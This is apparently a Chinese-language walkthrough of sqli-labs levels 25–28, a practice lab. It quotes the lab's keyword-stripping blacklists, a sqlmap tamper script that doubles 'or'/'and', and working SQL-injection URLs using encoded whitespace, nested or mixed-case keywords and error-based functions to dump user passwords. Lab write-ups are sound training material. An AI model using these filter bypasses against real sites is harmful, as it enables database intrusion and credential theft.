这个系列是绕过注入,题目已提示需要绕过的字符,且能显示出输入的payload
function blacklist($id){ $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive) return $id;}
从代码可以看出是吧or和and忽略大小正则替换成空
#!/usr/bin/env python
"""Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)See the file 'LICENSE' for copying permission"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs): """ Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier
>>> tamper('and or') 'anandd oorr' """
retVal = payload
if payload: retVal = re.sub(r"(?i)(and)", r"anandd", re.sub(r"(?i)(or)", "oorr", payload))
return retVal
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-25/?id=1" --tamper "xx.py" --technique E --threads 10 --dbs --batch
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);
if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; //echo 'YOU ARE IN ........'; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font size="5" color="#FFFF00">'; //echo 'You are in...........'; //print_r(mysql_error()); //echo "You have an error in your SQL syntax"; echo "</br></font>"; echo '<font color= "#0000ff" font size= 3>'; }} else { echo "Please input the ID as parameter with numeric value";}
function blacklist($id){ $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive) return $id;}
http://127.0.0.1/sqlilabs2/Less-25a/?id=-1 union select 1,(select group_concat(username,passwoorrd) from users) ,3--+
function blacklist($id){ $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive) $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out -- $id= preg_replace('/[#]/',"", $id); //Strip out # $id= preg_replace('/[\s]/',"", $id); //Strip out spaces $id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes return $id;}
payload:
http://127.0.0.1/sqlilabs2/Less-26/?id=1'%26%26extractvalue(null,concat(0x7e,(select(group_concat(username,'~',passwoorrd))from(security.users)),0x7e))%7c%7c'1
payload
http://127.0.0.1/sqlilabs2/Less-26a/??id=1111')union%A0select(1),(select(group_concat(id,'~',username,'~',passwoorrd))from(security.users)),3%7c%7c('1
function blacklist($id){$id= preg_replace('/[\/\*]/',"", $id); //strip out /*$id= preg_replace('/[--]/',"", $id); //Strip out --.$id= preg_replace('/[#]/',"", $id); //Strip out #.$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.$id= preg_replace('/select/m',"", $id); //Strip out spaces.$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.$id= preg_replace('/union/s',"", $id); //Strip out union$id= preg_replace('/select/s',"", $id); //Strip out select$id= preg_replace('/UNION/s',"", $id); //Strip out UNION$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT$id= preg_replace('/Union/s',"", $id); //Strip out Union$id= preg_replace('/Select/s',"", $id); //Strip out selectreturn $id;}
uniunionon selecselectt
select -> SeLect union -> UNion
payload
http://127.0.0.1/sqlilabs2/Less-27/?id=1'%09and%09updatexml(1,concat(0x7e,(SeleCt(group_concat(username,password))from(users)),0x7e),1)and'1
payload
http://127.0.0.1/sqlilabs2/Less-27a/?id=1"%09and%091=2%09%09uniunionon%09SElselectect%091,(SElect(group_concat(username,password))from(users)),3%09or%09"1
// connectivity $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; //print_r(mysql_error()); echo "</font>"; }} else { echo "Please input the ID as parameter with numeric value";}
function blacklist($id){$id= preg_replace('/[\/\*]/',"", $id); //strip out /*$id= preg_replace('/[--]/',"", $id); //Strip out --.$id= preg_replace('/[#]/',"", $id); //Strip out #.$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.//$id= preg_replace('/select/m',"", $id); //Strip out spaces.$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.return $id;}
union
union all select
直接上payload
http://127.0.0.1/sqlilabs2/Less-28/?id=1')%0aand%0a1=2%0aunion%0aall%0aselect%0a1,database(),3%0aor ('1
和上一关类似